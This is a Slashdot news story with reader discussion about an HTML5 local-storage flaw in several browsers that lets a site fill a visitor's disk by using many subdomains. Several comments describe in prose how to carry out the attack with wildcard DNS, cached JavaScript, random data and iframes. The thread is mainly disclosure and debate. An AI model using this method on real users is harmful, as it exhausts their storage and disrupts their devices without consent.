Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror
×
Bug Chromium Data Storage Firefox Internet Explorer Opera Safari News

HTML5 Storage Bug Can Fill Your Hard Drive 199

Dystopian Rebel writes "A Stanford comp-sci student has found a serious bug in Chromium, Safari, Opera, and MSIE. Feross Aboukhadijeh has demonstrated that these browsers allow unbounded local storage. 'The HTML5 Web Storage standard was developed to allow sites to store larger amounts of data (like 5-10 MB) than was previously allowed by cookies (like 4KB). ... The current limits are: 2.5 MB per origin in Google Chrome, 5 MB per origin in Mozilla Firefox and Opera, 10 MB per origin in Internet Explorer. However, what if we get clever and make lots of subdomains like 1.filldisk.com, 2.filldisk.com, 3.filldisk.com, and so on? Should each subdomain get 5MB of space? The standard says no. ... However, Chrome, Safari, and IE currently do not implement any such "affiliated site" storage limit.' Aboukhadijeh has logged the bug with Chromium and Apple, but couldn't do so for MSIE because 'the page is broken" (see http://connect.microsoft.com/IE). Oops. Firefox's implementation of HTML5 local storage is not vulnerable to this exploit."
This discussion has been archived. No new comments can be posted.

HTML5 Storage Bug Can Fill Your Hard Drive

Comments Filter:
  • by Anonymous Coward

    This seems like mental masturbation to me. I see no point in initiating such an "attack".

    If I understand correctly, you are going to expend great effort and possibly money on tens of thousands of subdomains, transfer a lot of data and incur bandwidth charges, in order to fill someone's hard drive? This is about the lamest DoS attack I have ever heard of. And the easy fix is to simply clear cookies?

    Come on, this is a non-issue looking to be a problem.

    • Imagine the network usage bill for your VPS trying to fill every hard drive of every device that visits your site.

      • by thetoadwarrior ( 1268702 ) on Thursday February 28, 2013 @12:41PM (#43035731) Homepage
        It's a web app, let the client generate it. You generate the free sub domains with a script or something a bit more intelligent but either way the cost should be minimal. I assume as well you wouldn't necessarily need to fill it completely. A gig or two might ruin the browser's performance.
      • by TheRaven64 ( 641858 ) on Thursday February 28, 2013 @01:58PM (#43036769) Journal
        You misunderstand how the attack works. The client-side code is allowed to store 5-10MB per domain, but it can generate this data (math.random() will do it fine). The per-domain thing mean that you need one HTTP request per 5-10MB, but on the server that will be a wildcard DNS entry always resolving to the same server. If you set the cache headers with a sufficiently long timeout, then you can probably have a single site hosting the .js (so the browser will only request it once) and then just send a tiny HTML page referencing it. The JavaScript then creates a new iframe with a new (random) subdomain as the target, and so you each HTTP request to your server (total of about 1KB of traffic) generates 5-10MB of data on the client's hard disk.
        • So 1k per 10MB. That's a 10,000x multiplier.

          Say I have 1TB free space. Before I run out of disk, it'll take 100MB of data, I'd be waiting for my browser to write out 1TB of data and there will be 100,000 HTTP requests made. 100,000 IFrame's... Browser probably crashed after a few hundred.

          I think I'd close my browser because it stopped responding before I get anywhere near running out of space. At 100MB/s (average spinny disk sequential write speed. I doubt Javascript could keep up generating data with that

          • If you look at what he's saying, you'll see that the javascript only gets downloaded once for all the domains. For each domain you need an html page that just has a script link to the fixed js file (that your browser already has cached). So, think maybe 100 bytes per 5-10MB.

            • Add all the HTTP headers to your 100 bytes as well, along with the HTTP request too. The browser will be sending the referrer url, the user agent string, cache control headers, etc.
              1k seems reasonable.

      • What if the data I stored was a string of "0" characters and the transfer was gz'd? That would shrink it quite drastically.

        • Reminds me of the gif of death, a blank PB sized image LZW compressed. It would crash browsers back in the day. Today it would probably wreak havok with thumbnail file managers.
      • Imagine the network usage bill for your VPS ...

        Imagine the profits for the HDD companies as people run out of space and order bigger and bigger disks. The HDD companies have the most obvious motive to exploit this bug.

    • Mobile devices? (Score:5, Insightful)

      by dclozier ( 1002772 ) on Thursday February 28, 2013 @12:19PM (#43035399)
      Devices with smaller drives like a cell phone, tablet or laptops like Google's Pixel would be more vulnerable. Perhaps if you created some javascript that simply made requests to iterated subdomains that simply returned a small amount of javascript that then generated large amounts of text to store locally? The bandwidth needed would be much less then and the same amount of damage done. I have no idea if this scenario is possible though so take this with a grain of salt.
    • by Qzukk ( 229616 ) on Thursday February 28, 2013 @12:19PM (#43035407) Journal

      Subdomains are free. With a wildcard DNS record, you have nearly an infinite supply of them.

      • by Anonymous Coward

        , transfer a lot of data and incur bandwidth charges,

        Posting anonymously since this shows how it could be done.

        I don't see any need to transfer data. Simply generate random strings programatically. One could easily write a few lines of code. The storage API is a 'key' and 'value' system, so just randomly generate keys and randomly generate values in a loop. Super easy. For the subdomain stuff, like others have said, wildcard for DNS. Then just serve the small js file that runs, then programtically generates a new random subdomain to dynamically load

      • The DNS specifications state the max length of a domain name is 253. Assuming you could get the smallest possible root domain name of 4 characters (x.cc for example) that means you would have 249 characters left.

        To complicate things a little more the specifications state each label (subdomain) can't exceed 63 characters. That means 3 full subdomains of 63 characters + 1 subdomain of 56 characters if you include the periods. Grand total of 245 characters to play with.

        The specifications state that the only va

        • 1.955e393, actually.

          You made three mistakes:
          * placing dots differently can give quite a lot of combinations
          * you can have subdomains shorter than the max, this effectively adds dots to the character set, with two restrictions: no two dots in a row/start/end, no string of >63 non-dots. The former reduces the base by a small but noticeable bit, the latter has only infinitessimal (colloquial sense) effect.
          * DNS names are case-insensitive

    • Not sure what effort you are referring to. I can create large numbers of subdomains using a simple script to modify the zone file. Subdomains cost nothing. No effort, and no money.
      Bandwidth is nearly nothing because I don't have to transfer any data to create data on the victim's drive if I use javascript.
      Lastly, you're not thinking about threats holistically. This just becomes one single tool added to a group of other tools that can be employed in an advanced persistent threat attack.
    • by bill_mcgonigle ( 4333 ) * on Thursday February 28, 2013 @12:37PM (#43035689) Homepage Journal

      If you have a popular blog, there's no need to pay for network backup anymore - just drop enough 5MB blocks encrypted and with decent FEC to each of your readers. If you ever have a failure, just throw up a basic page with a funny cat picture and start restoring from your distributed backup.

    • by sjames ( 1099 )

      Of course not. You will hack someone else's server and burn up their bandwidth.

  • Disable Javascript (Score:3, Insightful)

    by Anonymous Coward on Thursday February 28, 2013 @12:08PM (#43035211)

    Also, you're not vulnerable if you have javascript enabled.

    Such is life when your browser automatically downloads and runs arbitrary untrusted software.

  • This sounds like a nice weekend project, wonder how fast you can fill up a harddisk with just some javascript.

    • Assuming 500GB free space and a 20Mbps ADSL connection, call it 2MB/s down... I make it almost three days.

      I think you would notice.

      • by claar ( 126368 ) on Thursday February 28, 2013 @12:22PM (#43035461)

        You're assuming that you have to download the files. It's highly likely the data could be generated locally in JavaScript.

      • His example filled 1GB every 16 seconds, so 500GB in about two hours. That was an SSD though - you're basically limited by your hard drive's write speed (for extra fun, you'll likely fill up the disk cache and start swapping...). You may get 100MB/s from linear writes to a spinning disk, if you're lucky, 20-30MB/s is more plausible. The data isn't fetched from the server, it's generated by the JavaScript.
  • by Anonymous Coward

    but couldn't do so for MSIE because 'the page is broken" (see http://connect.microsoft.com/IE [microsoft.com]). Oops

    FUD! We haven't recieved a complaint yet.

    Yours truely,
    MS support.

  • It's a feature! (Score:4, Interesting)

    by sootman ( 158191 ) on Thursday February 28, 2013 @12:16PM (#43035335) Homepage Journal

    1.porn.com, 2.porn.com, 3.porn.com...

    Actually, that could be handy -- you could store lots of music from song.album.artist.someMP3site.com.

    • Re:It's a feature! (Score:4, Interesting)

      by sootman ( 158191 ) on Thursday February 28, 2013 @12:27PM (#43035543) Homepage Journal

      Come to think of it, it could lead to problems. What if you read a lot of blogs hosted on wordpress.com? Or use many apps on *.google.com?

      • by fatphil ( 181876 )
        Of course, you highlight another potential DOS - in the scenario you mention, one site can reduce the quota available to another subdomain, as they share it. It's a lose-lose situation: permit DOSing the user, or permit DOSing other sites on the same 2LD.

        Let's hope they understand how CCTLDs are organised. I don't like the idea of every site under *.co.uk sharing the same 5MB. When they specified cookies, they fucked up, I dont trust them to have learnt from their mistakes and got HTML5 correct, far from it
        • Let's hope they understand how CCTLDs are organised. I don't like the idea of every site under *.co.uk sharing the same 5MB.

          There's probably a reason that, contrary to the implication in TFS, the actual Web Storage Candidate Recommendation:

          • Recommends, but does not require, a per-origin quota,
          • Recommends, but does not require, user agents to take steps to identify and prevent use of "affiliated origins" to circumvent per-origin quotas,
          • Does not, in the preceding recommendation, provide a concrete definition of
        • There's an interesting paper by the Chrome guys from a couple of years back trying to define exactly what a web application is. A modern browser is trying to be an OS, and one of the fundamental tasks of an OS is isolating applications from each other. This is relatively difficult, as two applications may exchange files or use the same libraries, but at least they are launched as different processes. A web application is a tangle of resources from a variety of different domains running in one or more bro

          • by smash ( 1351 )
            I guess the way to do this is via certificate - and allocate x MB of storage per SSL certificate.
  • On Linux using the pepperflash plugins, lots & lots of zombie processes get created and aren't even killed after you exit the browser. When I noticed 5GB of memory usage on an empty desktop, I realized that Chromium is a pro-zombie browser.

    • Chrome will remain running if you have apps installed that want to run in the background. There is an option in Settings to suppress this behavior. On Windows Chrome keeps a notification icon showing so you can shut down the browser and force these background apps to quit. Other platforms probably have something similar.

      Chrome also keeps a process running for Cloud Print, if you have it enabled.

      The 5GB is probably a badly-behaving app/extension. Check Chrome's Task Manager to figure out which one.

  • isn't everyone's blog a subdomain?
  • A Stanford comp-sci student has found a serious bug in Chromium, Safari, Opera, and MSIE.

    OK, so we're talking about Google, Apple, Opera and Microsoft. But then...

    The current limits are: 2.5 MB per origin in Google Chrome, 5 MB per origin in Mozilla Firefox and Opera, 10 MB per origin in Internet Explorer.

    Now we're talking about Google, Mozilla, Opera and Microsoft. Where did Mozilla come from, and where did Apple go?

    Chrome, Safari, and IE currently do not implement any such "affiliated site" storage limit.' Firefox's implementation of HTML5 local storage is not vulnerable to this exploit.

    Now we're talking about Google, Apple, Microsoft and Mozilla. Apple's back, and Opera is left out this time, and even though the author seemed to be indicating that Mozilla's browser was on the vulnerable list, now it's set apart.

    Editors, if a summary is inconsistent, please clean it up or don't promote the story.

    • Where did Mozilla come from, and where did Apple go?

      The first part was talking about bugs; the second was talking about storage limits. Mozilla has no bug but does have a storage limit. Apple presumably has the bug, but we don't know what its storage limit is.

    • by ledow ( 319597 )

      And Opera loses mention later on entirely. Probably because the bug doesn't exist on the last few Opera stable versions at all:

      http://www.ledow.org.uk/Opera.jpg [ledow.org.uk]

  • by ledow ( 319597 ) on Thursday February 28, 2013 @01:30PM (#43036359) Homepage

    I call crap on the Opera thing.

    Latest stable Opera browser here, 12.14, updated 5th February:

    http://www.ledow.org.uk/Opera.jpg [ledow.org.uk]

    No mention of this in the 12.14 release notes (even as a "vulnerability with details to follow later", which is common practice for Opera changelogs), and silence on the article about exactly how/why/where Opera is vulnerable.

    If something pops up a million times and asks you for a Gigabyte and you click yes, then that's perfectly accepted user permission to do so.

    • I wonder how that works. I got that question after the counter was at 76MB. Well, at least it did ask, eventually. So I guess Opera is safe from this.
  • by azav ( 469988 ) on Thursday February 28, 2013 @03:02PM (#43037589) Homepage Journal

    I've seen Safari taking up to 8 GB of RAM. This seems due to sloppy variable clearing and this makes the swap file larger and can easily end up taking over your HD.

    Safari ends up being the biggest bloated pig with regards to RAM management on my Mac.

    • Is it also the application you use the most? And was that RAM actually in contention for other processes?

  • There's many, many ways to exhaust the resources through a browser. Just generate a huge document. Or sit in a recursive loop in JS until the stack fills the memory. By using imagination, various other methods can probably be found.
  • And this is why software homogenization is bad. Webkit is becoming the new IE6 but has far greater consequences because every smartphone is using a webkit based browser by default. Yes it also affected IE and Opera but Opera cut their core developers and are moving to Webkit so soon there will only be 3 major engines with one of them having a complete monopoly on smartphones.

  • You should try my new HTML5-enabled cloud storage site. Unlimited cheap space, really fast uploads :)

  • Should each subdomain get 5MB of space? The standard says no

    So, where is the limit supposed to apply? To all subdomains of .com? To all subdomains of .au? How about my ISP who offers me FOO.power.on.net? Should every customer's website on power.on.net have to share the same space?

    Poorly thought out standard is poor.

    The browsers obviously didn't put a limit in for subdomains because it doesn't make sense. You have no idea where the organisational boundary is with regards to domain vs. subdomain.

    C

    • by smash ( 1351 )
      By "didn't put a limit in for subdomains", I of course mean "didn't include subdomains in the parent's quota".

A morsel of genuine history is a thing so rare as to be always valuable. -- Thomas Jefferson

Working...